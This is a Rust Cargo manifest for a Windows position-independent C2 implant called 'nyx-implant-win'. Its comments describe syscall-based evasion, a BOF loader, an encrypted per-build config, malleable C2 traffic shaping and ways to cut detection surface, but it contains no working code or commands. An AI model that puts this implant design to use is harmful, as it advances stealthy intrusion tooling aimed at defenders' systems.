# NOTE: not a workspace member — requires nightly + a Windows x86_64 target
# and the PIC extraction step (see README.md). Kept standalone so the stable
# workspace stays green on the dev host. Build standalone:
#   cargo +nightly check -p nyx-implant-win --target x86_64-pc-windows-gnu
[package]
name = "nyx-implant-win"
version = "0.2.0"
edition = "2021"
license = "Apache-2.0 OR MIT"
description = "Nyx Windows PIC implant (BRC4-grade stealth). Requires nightly + Windows toolchain to build."
[features]
default = []
# Gate the ~50 #[no_mangle] nyx_selftest_* / nyx_linger* rundll32 exports
# behind this feature (P1-11b). Production builds (default features) exclude
# all selftest exports - the largest avoidable detection surface. Test/debug
# builds use --features selftest to include them.
selftest = []

# Standalone (NOT in the root workspace) so the dev-host stable workspace stays
# green. Declares its own (empty) workspace to decouple from the root members.
[workspace]

# Built position-independent: no std runtime, no main, panic = abort.
[lib]
crate-type = ["cdylib"]

[dependencies]
# Path deps (this crate is standalone, outside the root workspace). protocol
# builds WITHOUT its `std` feature here — the implant is #![no_std], so pulling
# in std would duplicate the panic_impl lang item.
nyx-protocol = { path = "../protocol", default-features = false }
# Evasion kit: SSN resolution + indirect-syscall stub templates. The resolve
# module implements SyscallSource over the live ntdll, turning these algorithms
# into a runtime.
nyx-evasion = { path = "../evasion" }
# COFF/BOF loader core (no_std-compatible): parse + relocate a CS-compatible
# BOF object file. The implant's bof.rs maps sections W^X and runs them.
nyx-coff = { path = "../coff" }
# Userland evasion kit seams (no_std): pure-Rust gap/frame/rc4 algorithm cores
# + trait seams. The implant feeds live .pdata bytes (read via the PEB walk in
# resolve.rs) into gap::enumerate_gaps; the math lives ONLY here so the PIC
# implant never re-implements it. See docs/WINDOWS_DEV.md §4 (P2.1a-i).
nyx-implant-evasionsdk = { path = "../implant-evasionsdk", default-features = false }
# Per-build encrypted config. no_std feature → only `decrypt` is pulled in
# (chacha20poly1305 + alloc; no rand/getrandom). build.rs encrypts the config
# on the host (std) and bakes key/nonce/ciphertext into OUT_DIR/config_blob.rs;
# the runtime crate only decrypts.
nyx-config = { path = "../config", default-features = false, features = ["no_std"] }
# Malleable C2 transform engine (no_std): the implant applies the http-post
# client envelope to each request body and inverts the server envelope on each
# response. build.rs resolves the profile host-side (std) and bakes the
# resolved Step/Terminator lists; the runtime crate only encodes/decodes.
nyx-profile = { path = "../profile", default-features = false, features = ["no_std"] }

[build-dependencies]
# build.rs encrypts the config blob per-build (host-side, std). Needs the
# `std` feature for nyx_config::encrypt (OsRng-backed).
nyx-config = { path = "../config" }
# build.rs parses NYX_PROFILE (host-side, std) and bakes the resolved envelope
# Step/Terminator lists into OUT_DIR/envelopes.rs for the runtime crate.
nyx-profile = { path = "../profile" }

# no_std PIC: dev/check builds must abort too — there's no unwinding without
# std, so any debug panic path (e.g. integer-overflow checks) would otherwise
# fail `cargo check` with "unwinding panics are not supported without std".
[profile.dev]
panic = "abort"

[profile.release]
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"
strip = true
